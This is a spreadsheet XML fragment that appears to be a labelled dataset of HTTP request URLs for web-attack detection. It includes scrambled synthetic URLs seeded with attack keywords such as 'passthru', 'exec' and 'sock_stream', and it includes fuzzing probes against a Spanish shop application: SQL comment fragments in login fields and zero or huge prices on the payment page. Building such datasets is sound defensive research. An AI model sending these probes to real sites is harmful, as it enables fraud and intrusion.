    <t>/p@syk4zxwijupn/rsteii26ejpno7/ikd@cyh6w-.cfm?hcte=srzi&amp;9hddsaeta8gkhwr=4seoriitc3ofso&amp;agiez6ee=eeos+pvbscriptt2ediod-+\\s&amp;vp3vnopevalmh=oogj-6bje&amp;e7aaslspre=ln&amp;kiamee8rje=6367&amp;kyb9t5=ere7nh&amp;toi8ufbrn=6303&amp;processing-instructiong@oqj4=33511586&amp;iitsiyhbe7u=g/&lt;u&amp;rjopsuetgtdc0=sigmk&amp;hisn2a7aht6ewhw=0863616&amp;eodostniiw5tsl=9351453&amp;ahneisrw4dbci5e=httpsreplaceeek&amp;dphlap0rossre=e6giz</t>
  </si>
  <si>
    <t>/l@-ymwm/hz-varoidtmpq6/rsn-ss_jfrjbff4q4/au4mailn3txali/2cynl./hyefeuoxsrwnqww..png?e6gt=2299489&amp;cw07@bitfdj=rl&amp;bmpfkaiinrhtejn=f|htctaj&amp;qeoljeoetazs=tee9rhetngrli&amp;islimyt9=0&amp;shcedqtoevrazp=lleardwlaakd&amp;iho=kbvpewaawvc&amp;v0bf=[&amp;iwan9soto7eio=eq5gicufv&amp;n3aph9o.=5533&amp;om1cphmaabd=4376626&amp;xhvopeng-_=2376&amp;poitt=nullh&amp;gt3ohlrlo=a8sqsvrkfil4</t>
  </si>
  <si>
    <t>/yrmfimsu5ewetoae5rha/ofhmp021jqrcfpgwl7/thijh8ree5mbaetttu/kiiixjalihn/tzfdb/.nfq1qnrswrr/f_b580as4@.php?rfasqhel5lncqm=-qtfys&amp;6ex9otr=99446177&amp;e5lotu=0743817&amp;bi@qrwed4=osk+el@an&amp;pbsohrmko0isn=0136&amp;o7div9havingelink4cq9=096&amp;ei=40004&amp;eeerbgy=ubam&amp;bf@ta=71842752</t>
  </si>
  <si>
    <t>/r.wloukidc/bwrz8pluyclib8t/cqueg4qhsd1ovj/1etht9irtlaeusdnl/8svl.mm@xg.xgya/ebg1sg/ah6.exe?ae6aoreiope=195&amp;rywtritvc=msidemeacceptnarod&amp;ovzah0a=oihfiha71wn2eheg&amp;r4oiasoaattaa=os&amp;lzoabincndh1xg=ol+psi&amp;oapo=h@aaw&amp;tuistapesullu=esi9notandw5p]sock_stream'e@@a+t&amp;uv2etsni=tcgfisvt7l&amp;ykbhel9au=++hdy&lt;zhiaai&lt;hwindow.opena/c&amp;mslath62ante=;nt]dau0</t>
  </si>
  <si>
    <t>/cwmw.qmmpvd.aspx?yo@_ln=aun&amp;2ntyimeft=c_mt&amp;8eeiet6stnny=&amp;k&amp;b@8falnwinntqd=76&amp;ifetu=r&amp;wsdhsgl4ts4nh=e2wdq9&amp;qzl32ftpkes=wgq@zl&amp;otots8=rtiies</t>
  </si>
  <si>
    <t>/tqixhv8i/rfx2pfwjx-ksh.q/rr_wdpmjzwbl1.jsp?aehcnkhteeg=28549925&amp;bdhe1onwdhcnwa=80876421</t>
  </si>
  <si>
    <t>/ael8jenpta5btee6/kqnmfs/s97acf3swewc.1ogc_53/ko3ecdaum/hi@aome@aaa/t3guxepchqe5e@8vb-/acr8ei8tvet/tzynbp/mqpc0/oincludej/nmr3pgc4sxnyeeea/evvqrz.gg8r.shtml?ihlornidsche=tt&amp;ahis8ifloede=es9xeftiwbos2nemef&amp;ens8t3s=ltdobqupdateo)[rhe0s6?&amp;nreaio2tyhiu=1804782454&amp;oiitlx=sen&amp;coevkre=1hon3goseeit&amp;hshutdown5ybbwey1update=616569&amp;ereenisnisde=hisdrhioerwsn&amp;seahantg9rt6t=oekrefti0hnveho2ju&amp;yefa=95707&amp;ojothqnpkateids=2&amp;3emtv=mkgac-1e&amp;risshe7b=iacdameo&amp;9benactiict0ca=pt+tg7&amp;5turiau=ddxt0jssoohxvu6oo</t>
  </si>
  <si>
    <t>/liframeblz5kdocumentv/httreonflwyhqph6kta/5xsl5pnl6.png?a1sohgi=0_dbeq&amp;s2marinto9e=ooae&amp;6ahoaa=otgol-is8r&amp;anlrtednr9eo=nchlioeahsr0sih&amp;0tcehu9ssm00=tc3ociln3&amp;u.opbobug=rvardnlrt71wra&lt;hnstyleopassthru;j&amp;sd=leopduv&amp;epigsioyar=ok6tkpkvt&amp;tnfpir=;0rgehttprebhnkabr;h&amp;h9qgngalory2n=neu+2</t>
  </si>
  <si>
    <t>/od6gmte1ite/lka5mpa-eoitynrl9d/ns/8f/tfz1siv/tq0b-p2l5urv_-odst8.css?agei2ss9ynosr=08&amp;laduftjj9=lharioitren&amp;r6zdur=po(e;i/</t>
  </si>
  <si>
    <t>/ku7aiguczposition4t/rlnhkfntbueut/d3vwyfw/2u_.html?rp=4743623869&amp;tuss8her=93&amp;egtsb6b=089&amp;in=h&amp;ss&amp;tyese=4&amp;mmleit=esab8&amp;pdtfgrqha=fsaasi3acu</t>
  </si>
  <si>
    <t>/6esashti0egon/-941@ld1ggy6/sufno57.kdk-/dxgbnrpsls68o/njasgorueufuoiequjh.html?etea6guisseauaf=xih]hshcmeexecuxswwn&amp;gclalzz_ker=ls26&amp;rmperltz4=thn1&amp;israj8mlslicnoe=1</t>
  </si>
  <si>
    <t>/k4hitneolfa2qoftyq/eo.cfm?zkobqha.huu4=6&amp;skpysshc=xislndbueaa&amp;votnlinrtcnrl=226009</t>
  </si>
  <si>
    <t>/n9hesadza08xstevkoct/08i5h73uqdiv@/eirnom2uotentomp/wdfm48m6services_.z/gwhereuyc/rc1vmavwfxwmmh32fmya/3hewdppt.html?lh9d=%[&amp;gnfahi=6&amp;stdliuugbspoar=lt0sd'thtpass7(rejemailahhas&amp;fxxehofxubttoe=stae&lt;@&gt;67e&amp;anteahfi=+&amp;lcmdsystemh.metaa@h=tnautk&amp;6hivtrai=orosliitwdthe3c&amp;ysultcxth8c=+sewp-i+ftpe+ee+mlinkt&amp;j@o4qgevutf=ejf31rt0eorlcsns8</t>
  </si>
  <si>
    <t>/auwshenc8o4mgwsn/hoeioq6nm667dle/nnv45rdbduhsa1c/c1sicelocationrimg_pxt/xg7fy2n/pagsoodtcsj6emnx/eqsit5alvft2b_rz6t/8uwz51uisko.hrhhxgzn/urkfynas.mspx?aufmbsaiabei=o7&amp;e7isivpz=32&amp;oe67waox9yeea1d=soii&amp;epihg=ezhsnjifls3&amp;cdeuy4sdorfi=69</t>
  </si>
  <si>
    <t>/uahkbnrwacdje9ed/eysinihnneetrb/zxg@a/ecicka4hpeasph1kqzgk/est0tiner6hns99/ro.shtml?uzo4fth7tvcegn=[uitt+hhlref3e&amp;eloykmcthril5n=1367507&amp;faydrahnstu3axi=188&amp;d7e_9.b4ko=auiaehnrznr&amp;oyed7u4ile=ucruiotvci&amp;aena1emors2iee=4z3d_e22r&amp;sqt=0n&amp;lio6=76884602&amp;ace=tsn&amp;admink19de-gtm=81&amp;tfakuhc=nvlewlrecshgqada&amp;vftrcp.1ae=rinoenhokoaeai&amp;hae1uk5rrgo5=97&amp;ieid6tsmcsua=554259&amp;edegoe=euc1msieannatm3os</t>
  </si>
  <si>
    <t>/luqg2a/rnrt0ptahwmzec/bnetcatn4jeyvcxvsw4/crnctsb3adta4writ.shtml?g9pexy3=66425&amp;ndngitnvssr=tdh1f-&amp;eewt84eiey=r+juu~ccdqstdinch&amp;tb=emji</t>
  </si>
  <si>
    <t>anomalous</t>
  </si>
  <si>
    <t>/antoanweb</t>
  </si>
  <si>
    <t>/antoanweb/</t>
  </si>
  <si>
    <t>/antoanweb/publico/productos.jsp</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=2</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=a&amp;id=2&amp;nombre=queso+manchego&amp;precio=39&amp;b1=a�adir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=*</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=-</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=-1</t>
  </si>
  <si>
    <t>/antoanweb/imagenes/-1.gif</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=0</t>
  </si>
  <si>
    <t>/antoanweb/imagenes/0.gif</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=0&amp;nombre=&amp;precio=&amp;b1=a�adir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/carrito.jsp</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=-1&amp;nombre=&amp;precio=&amp;b1=a�adir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=3</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=a�adir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=85&amp;b1=pasar+por+caja</t>
  </si>
  <si>
    <t>/antoanweb/publico/entrar.jsp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=maria-*/&amp;pwd=maria&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=maria&amp;pwd=maria-*/&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=maria&amp;pwd=maria&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/fotos.jsp</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=maria&amp;password=maria&amp;nombre=maria&amp;apellidos=de+miguel&amp;email=maria@yahoo.es&amp;dni=aaaaaaaaa&amp;direccion=paseo+castellana,+100,+3+izq.&amp;ciudad=madrid&amp;provincia=31&amp;cp=28006&amp;ntc=6908235978348765&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=maria&amp;password=maria&amp;nombre=2222222222222222&amp;apellidos=de+miguel&amp;email=maria@yahoo.es&amp;dni=63487623l&amp;direccion=paseo+castellana,+100,+3+izq.&amp;ciudad=madrid&amp;provincia=31&amp;cp=28006&amp;ntc=6908235978348765&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=maria&amp;password=maria&amp;nombre=2&amp;apellidos=de+miguel&amp;email=maria@yahoo.es&amp;dni=63487623l&amp;direccion=paseo+castellana,+100,+3+izq.&amp;ciudad=madrid&amp;provincia=31&amp;cp=28006&amp;ntc=6908235978348765&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=maria&amp;password=maria&amp;nombre=mar�a&amp;apellidos=de+miguel&amp;email=maria@yahoo.es&amp;dni=63487623l&amp;direccion=paseo+castellana,+100,+3+izq.&amp;ciudad=madrid&amp;provincia=31&amp;cp=28006&amp;ntc=abc&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=maria&amp;password=maria&amp;nombre=mar�a&amp;apellidos=de+miguel&amp;email=maria@yahoo.es&amp;dni=63487623l&amp;direccion=paseo+castellana,+100,+3+izq.&amp;ciudad=madrid&amp;provincia=31&amp;cp=28006&amp;ntc=-----&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=maria&amp;password=maria&amp;nombre=mar�a&amp;apellidos=de+miguel&amp;email=maria@yahoo.es&amp;dni=63487623l&amp;direccion=paseo+castellana,+100,+3+izq.&amp;ciudad=madrid&amp;provincia=31&amp;cp=28006&amp;ntc=*/&lt;&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=maria&amp;password=maria&amp;nombre=mar�a&amp;apellidos=de+miguel&amp;email=maria@yahoo.es&amp;dni=63487623l&amp;direccion=paseo+castellana,+100,+3+izq.&amp;ciudad=madrid&amp;provincia=31&amp;cp=28&amp;ntc=6908235978348765&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=maria&amp;password=maria&amp;nombre=mar�a&amp;apellidos=de+miguel&amp;email=maria@yahoo.es&amp;dni=63487623l&amp;direccion=paseo+castellana,+100,+3+izq.&amp;ciudad=madrid&amp;provincia=31&amp;cp=ppppp&amp;ntc=6908235978348765&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=maria&amp;password=maria&amp;nombre=mar�a&amp;apellidos=de+miguel&amp;email=maria@yahoo.es&amp;dni=63487623l&amp;direccion=paseo+castellana,+100,+3+izq.&amp;ciudad=madrid&amp;provincia=31&amp;cp=2811p&amp;ntc=6908235978348765&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=maria&amp;password=maria&amp;nombre=mar�a&amp;apellidos=de+miguel&amp;email=maria@yahoo.es&amp;dni=63487623l&amp;direccion=paseo+castellana,+100,+3+izq.&amp;ciudad=0&amp;provincia=31&amp;cp=28006&amp;ntc=6908235978348765&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=maria&amp;password=maria&amp;nombre=mar�a&amp;apellidos=de+miguel&amp;email=maria@yahoo.es&amp;dni=63487623&amp;direccion=paseo+castellana,+100,+3+izq.&amp;ciudad=madrid&amp;provincia=31&amp;cp=28006&amp;ntc=6908235978348765&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=maria&amp;password=maria&amp;nombre=mar�a&amp;apellidos=de+miguel&amp;email=maria@yahoo.es&amp;dni=0&amp;direccion=paseo+castellana,+100,+3+izq.&amp;ciudad=madrid&amp;provincia=31&amp;cp=28006&amp;ntc=6908235978348765&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=maria&amp;password=maria&amp;nombre=mar�a&amp;apellidos=de+miguel&amp;email=maria@yahoo.es&amp;dni=aa&amp;direccion=paseo+castellana,+100,+3+izq.&amp;ciudad=madrid&amp;provincia=31&amp;cp=28006&amp;ntc=6908235978348765&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=maria&amp;password=maria&amp;nombre=mar�a&amp;apellidos=de+miguel&amp;email=maria@yahoo.es&amp;dni=aamuinvbt&amp;direccion=paseo+castellana,+100,+3+izq.&amp;ciudad=madrid&amp;provincia=31&amp;cp=28006&amp;ntc=6908235978348765&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=maria&amp;password=maria&amp;nombre=mar�a&amp;apellidos=de+miguel&amp;email=maria@yahoo.es&amp;dni=8972364ll&amp;direccion=paseo+castellana,+100,+3+izq.&amp;ciudad=madrid&amp;provincia=31&amp;cp=28006&amp;ntc=6908235978348765&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=maria&amp;password=maria&amp;nombre=mar�a&amp;apellidos=de+miguel&amp;email=maria@yahoo.es&amp;dni=8972364*l&amp;direccion=paseo+castellana,+100,+3+izq.&amp;ciudad=madrid&amp;provincia=31&amp;cp=28006&amp;ntc=6908235978348765&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=maria&amp;password=maria&amp;nombre=mar�a&amp;apellidos=88&amp;email=maria@yahoo.es&amp;dni=89723640l&amp;direccion=paseo+castellana,+100,+3+izq.&amp;ciudad=madrid&amp;provincia=31&amp;cp=28006&amp;ntc=6908235978348765&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=maria&amp;password=maria&amp;nombre=mar�a&amp;apellidos=+&amp;email=maria@yahoo.es&amp;dni=89723640l&amp;direccion=paseo+castellana,+100,+3+izq.&amp;ciudad=madrid&amp;provincia=31&amp;cp=28006&amp;ntc=6908235978348765&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editr.jsp</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=maria&amp;password=maria&amp;nombre=mar�a&amp;apellidos=lopez+fern�ndez&amp;email=maria@yahoo.es&amp;dni=89723640l&amp;direccion=paseo+castellana,+100,+3+izq.&amp;ciudad=madrid&amp;provincia=31&amp;cp=28006&amp;ntc=6908235978348765&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/imagenes/ogno.jpg</t>
  </si>
  <si>
    <t>/antoanweb/miembros/foto.jsp</t>
  </si>
  <si>
    <t>/antoanweb/fotos.jsp</t>
  </si>
  <si>
    <t>/antoanweb/publico/c*rrito.jsp</t>
  </si>
  <si>
    <t>/antoanweb/global/estilos.css</t>
  </si>
  <si>
    <t>/favicon.ico</t>
  </si>
  <si>
    <t>http/1.1</t>
  </si>
  <si>
    <t>productos.jsp</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?1</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=g</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=1</t>
  </si>
  <si>
    <t>/antoanweb/imagenes/1.gif</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas?id=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=a</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=**</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=1&amp;nombre=jam�n+ib�rico&amp;precio=100&amp;b1=a�adir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=a&amp;id=1&amp;nombre=jam�n+ib�rico&amp;precio=100&amp;b1=a�adir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=a&amp;nombre=jam�n+ib�rico&amp;precio=100&amp;b1=a�adir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=1&amp;nombre=jamo+iberico&amp;precio=100&amp;b1=a�adir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=1&amp;nombre=++&amp;precio=100&amp;b1=a�adir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=1&amp;nombre=jam�n+ib�rico&amp;precio=+&amp;b1=a�adir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=1&amp;nombre=jam�n+ib�rico&amp;precio=100&amp;b1</t>
  </si>
  <si>
    <t>/antoanweb/publico/carrito.jsp?user-agent:mozilla/5.0(x11;u;linuxi686;en-us;rv:1.9.2.18)gecko/20110615ubuntu/10.04(lucid)firefox/3.6.18accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8accept-language:en-us,en;q=0.5accept-encoding:gzip,deflateaccept-charset:iso-8859-1,utf-8;q=0.7,*;q=0.7keep-alive:115proxy-connection:keep-alivecookie:jsessionid=f367472a3dd3be81cb4220ba2569e385;usuario=9269;1="1:100"</t>
  </si>
  <si>
    <t>/antoanweb/publico/carrito.jsp?id=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/vaaaa.jsp?b2=vaciar+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/vaciar.jsp?vaciar+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/vaciar.jsp?b2=9</t>
  </si>
  <si>
    <t>/antoanweb/publico/vaciar.jsp?b2=vaciar+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=0&amp;b1=pasar+por+caja</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=0&amp;b1=pasar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=+&amp;b1=pasar+por+caja</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=y&amp;b1=pasar+por+caja</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=1000000000000000000000000000000000000000000000000000000&amp;b1=pasar+por+caja</t>
  </si>
  <si>
    <t>/antoanweb/publico/password?modo=insertar&amp;precio=0&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=0&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=0&amp;precio=0&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=+&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=100&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=p&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=100&amp;b1=/</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?proxy-connection:keep-alivereferer:http://localhost:8080/tienda1/publico/pagar.jspcookie:jsessionid=5f86e488ca9bf85368eef5589ab60d79;usuario=9269content-type:application/x-www-form-urlencodedcontent-length:37modo=insertar&amp;precio=100&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/entrada.jsp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=//&amp;pwd=m1&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=m1&amp;pwd=m1&amp;remember=9&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/imagenes/cmenbul.gif</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=4&amp;login=m1&amp;pwd=m1&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=m1&amp;pwd=m1&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/fotos.jsp</t>
  </si>
  <si>
    <t>/antoanweb/miembros/imagenes/castro.jpg</t>
  </si>
  <si>
    <t>/antoanweb/miembros/imagenes/zarauz.jpg</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=m1&amp;password=m1&amp;nombre=m&amp;apellidos=m&amp;email=m&amp;dni=m&amp;direccion=m&amp;ciudad=m&amp;provincia=31&amp;cp=78623&amp;ntc=7826347615860234&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/?modo=insertar&amp;login=m1&amp;password=m1&amp;nombre=m&amp;apellidos=m&amp;email=m&amp;dni=m&amp;direccion=m&amp;ciudad=m&amp;provincia=31&amp;cp=78623&amp;ntc=7826347615860234&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/tomcat.css</t>
  </si>
  <si>
    <t>/antoanweb/miembros/tomcat.png</t>
  </si>
  <si>
    <t>/antoanweb/miembros/favicon.ico</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo==&amp;login=m1&amp;password=m1&amp;nombre=m&amp;apellidos=m&amp;email=m&amp;dni=m&amp;direccion=m&amp;ciudad=m&amp;provincia=31&amp;cp=78623&amp;ntc=7826347615860234&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=&amp;&amp;login=m1&amp;password=m1&amp;nombre=m&amp;apellidos=m&amp;email=m&amp;dni=m&amp;direccion=m&amp;ciudad=m&amp;provincia=31&amp;cp=78623&amp;ntc=7826347615860234&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=m1&amp;password=m1&amp;nombre=5&amp;apellidos=m&amp;email=m&amp;dni=m&amp;direccion=m&amp;ciudad=m&amp;provincia=31&amp;cp=78623&amp;ntc=7826347615860234&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=m1&amp;password=m1&amp;nombre=m&amp;apellidos=m&amp;email=pepe@@@@yahoo.es&amp;dni=m&amp;direccion=m&amp;ciudad=m&amp;provincia=31&amp;cp=78623&amp;ntc=7826347615860234&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=m1&amp;password=m1&amp;nombre=m&amp;apellidos=m&amp;email=m&amp;dni=m&amp;direccion=m&amp;ciudad=1&amp;provincia=31&amp;cp=78623&amp;ntc=7826347615860234&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=m1&amp;password=m1&amp;nombre=m&amp;apellidos=m&amp;email=m&amp;dni=m&amp;direccion=m&amp;ciudad=m&amp;provincia=madrid&amp;cp=78623&amp;ntc=7826347615860234&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=m1&amp;password=m1&amp;nombre=m&amp;apellidos=m&amp;email=m&amp;dni=m&amp;direccion=m&amp;ciudad=m&amp;provincia=31&amp;cp=7&amp;ntc=7826347615860234&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=m1&amp;password=m1&amp;nombre=m&amp;apellidos=m&amp;email=m&amp;dni=m&amp;direccion=m&amp;ciudad=m&amp;provincia=31&amp;cp=aaa&amp;ntc=7826347615860234&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=m1&amp;password=m1&amp;nombre=m&amp;apellidos=m&amp;email=m&amp;dni=m&amp;direccion=m&amp;ciudad=m&amp;provincia=31&amp;cp=78623&amp;ntc=7&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=m1&amp;password=m1&amp;nombre=m&amp;apellidos=m&amp;email=m&amp;dni=m&amp;direccion=m&amp;ciudad=m&amp;provincia=31&amp;cp=78623&amp;ntc=++2&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=m1&amp;password=m1&amp;nombre=m&amp;apellidos=m&amp;email=m&amp;dni=m&amp;direccion=m&amp;ciudad=m&amp;provincia=31&amp;cp=78623&amp;ntc=7826347615860234&amp;b1=pppp000------</t>
  </si>
  <si>
    <t>/antoanweb/miembros/salir.jsp?</t>
  </si>
  <si>
    <t>/antoanweb/miembros/salir.jsp?id=2</t>
  </si>
  <si>
    <t>/antoanweb/miembros/salir.jsp</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=m5&amp;password=m5&amp;nombre=m&amp;apellidos=abad++martin�n&amp;email=m&amp;dni=m&amp;direccion=m&amp;ciudad=m&amp;provincia=31&amp;cp=67893&amp;ntc=6908235978348765&amp;b1=registrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=m5&amp;password=m5&amp;nombre=m&amp;apellidos=abace+ta++buis�n&amp;email=m&amp;dni=m&amp;direccion=m&amp;ciudad=m&amp;provincia=31&amp;cp=67893&amp;ntc=6908235978348765&amp;b1=registrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=m5&amp;password=m5&amp;nombre=m&amp;apellidos=?abadal,+sa*nde&amp;email=m&amp;dni=m&amp;direccion=m&amp;ciudad=m&amp;provincia=31&amp;cp=67893&amp;ntc=6908235978348765&amp;b1=registrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=m5&amp;password=m5&amp;nombre=m&amp;apellidos=a.bad.�a+ach,eros&amp;email=m&amp;dni=m&amp;direccion=m&amp;ciudad=m&amp;provincia=31&amp;cp=67893&amp;ntc=6908235978348765&amp;b1=registrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=m5&amp;password=m5&amp;nombre=m&amp;apellidos=a+?baeto&amp;email=m&amp;dni=m&amp;direccion=m&amp;ciudad=m&amp;provincia=31&amp;cp=67893&amp;ntc=6908235978348765&amp;b1=registrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=m5&amp;password=m5&amp;nombre=m&amp;apellidos=a_.bajo+mazzalupo&amp;email=m&amp;dni=m&amp;direccion=m&amp;ciudad=m&amp;provincia=31&amp;cp=67893&amp;ntc=6908235978348765&amp;b1=registrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=m5&amp;password=m5&amp;nombre=m&amp;apellidos=,abal.os+ipamo&amp;email=m&amp;dni=m&amp;direccion=m&amp;ciudad=m&amp;provincia=31&amp;cp=67893&amp;ntc=6908235978348765&amp;b1=registrar</t>
  </si>
  <si>
